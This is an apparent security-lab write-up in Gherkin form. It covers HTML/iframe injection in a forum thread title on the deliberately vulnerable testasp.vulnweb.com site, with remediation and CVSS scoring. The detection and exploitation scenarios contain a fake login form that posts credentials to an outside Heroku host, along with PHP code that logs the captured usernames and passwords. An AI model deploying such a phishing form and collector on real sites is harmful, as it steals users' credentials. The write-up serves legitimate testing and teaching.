## Version 1.4.1
## language: en

Feature:
  TOE:
    Acuforum
  Category:
    Improper neutralization of script-related HTML tags
  Location:
    https://testasp.vulnweb.com/showforum.asp?id=0 - Thread title (field)
  CWE:
    CWE-0080: improper neutralization of script-related HTML tags
    https://cwe.mitre.org/data/definitions/80.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Detect and exploit improper neutralization of script-related HTML tags
  Recommendation:
    Always validate and sanitize the inputs fields

  Background:
  Hacker's software:
    | <Software name>   | <Version>       |
    | Ubuntu            | 18.04.3 LTS     |
    | Firefox           | 69.0            |
  TOE information:
    Given I am accessing the site http://testasp.vulnweb.com
    And I enter an "ASP.NET" site
    And the server is running Microsoft SQL Server version 8.5

  Scenario: Normal use case
    When I enter the forum page of the website
    Then I can post something

  Scenario: Static detection
    When I don't have access to source code
    Then I can't do the static detection

  Scenario: Dynamic detection
    When I enter an iframe in the "Thread title" field
    """
    <form action="https://thawing-badlands-08862.herokuapp.com/iframe.php"
    method="POST">
       <table class="FramedForm" width="350" cellspacing="5" cellpadding="0"
        border="0" align="center">
      <tbody>
        <tr>               <td>Username:</td>
      <td align="right"><input name="login" type="text" class="Login"
         id="tfUName"></td>
            </tr>
      <tr>               <td>Password:</td>
        <td align="right"><input name="Password" type="password"
          class="Login" id="tfUPass"></td>
      </tr>
        <tr>
          <td>&nbsp;</td>
            <td align="right"><input type="submit" value="Login"></td>
        </tr>
            </tbody>
          </table>
    </form>
    """
    Then I can see the "form iframe" post [evidence](img.png)
    And I can conclude that it can be affected by iframe injection

  Scenario: Exploitation
    When I use this HTML injection in conjunction with this vulnerability
    """
    <form action="https://thawing-badlands-08862.herokuapp.com/iframe.php"
    method="POST">
       <table class="FramedForm" width="350" cellspacing="5" cellpadding="0"
        border="0" align="center">
      <tbody>
        <tr>               <td>Username:</td>
    <td align="right"><input name="login" type="text" class="Login"
       id="tfUName"></td>
          </tr>
    <tr>               <td>Password:</td>
      <td align="right"><input name="Password" type="password"
        class="Login" id="tfUPass"></td>
    </tr>
      <tr>
        <td>&nbsp;</td>
          <td align="right"><input type="submit" value="Login"></td>
      </tr>
        </tbody>
      </table>
    </form>
    """
    And I use a simple "Heroku web app"
    """
    https://thawing-badlands-08862.herokuapp.com/iframe.php
    """
    And I use this PHP code to store the data provided by the POST Request
    """
    <?php
      $login = $_POST['login'];
      $password = $_POST['Password'];
      $open = fopen('iframelog.txt', 'a+');
      fputs($open, 'Login : ' . $login . '<br >' . 'Password : ' .
       $password . '<br >' . '<br >'. "\n\n");
    ?>
    https://thawing-badlands-08862.herokuapp.com/iframelog.txt
    """
    And I can intercept all who visit and send the form on this page
    """
    https://testasp.vulnweb.com/showforum.asp?id=0
    """
    And I can store the data [evidence](img2.png)
    And I can conclude that it can be affected by this vulnerability

  Scenario: Remediation
    Given the site use unsafe mechanisms to validate and sanitize the inputs
    When I enter a value it must be inserted only if it is trusted data
    And all the inputs should be neutralized
    And It must use output encoding ISO-8859-1, UTF-7 or UTF-8
    And It must set the session cookie to be HttpOnly

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (High) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N
  Temporal: Attributes that measure the exploit's popularity and fiabilty
    6.8/10 (Medium) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.0/10 (High) - RC:C/CR:H/IR:L/AR:M/MAC:L/MPR:N/MUI:R/MC:H/MA:N

  Scenario: Correlations
    vbd/acuforum/0079-xss-forum
      Given I can use iframe injection to create a fake form
      And I can create a JavaScript code provided by 0079-xss-forum
      When someone visits the search page and send the fake form
      Then I can steal the data and the cookies
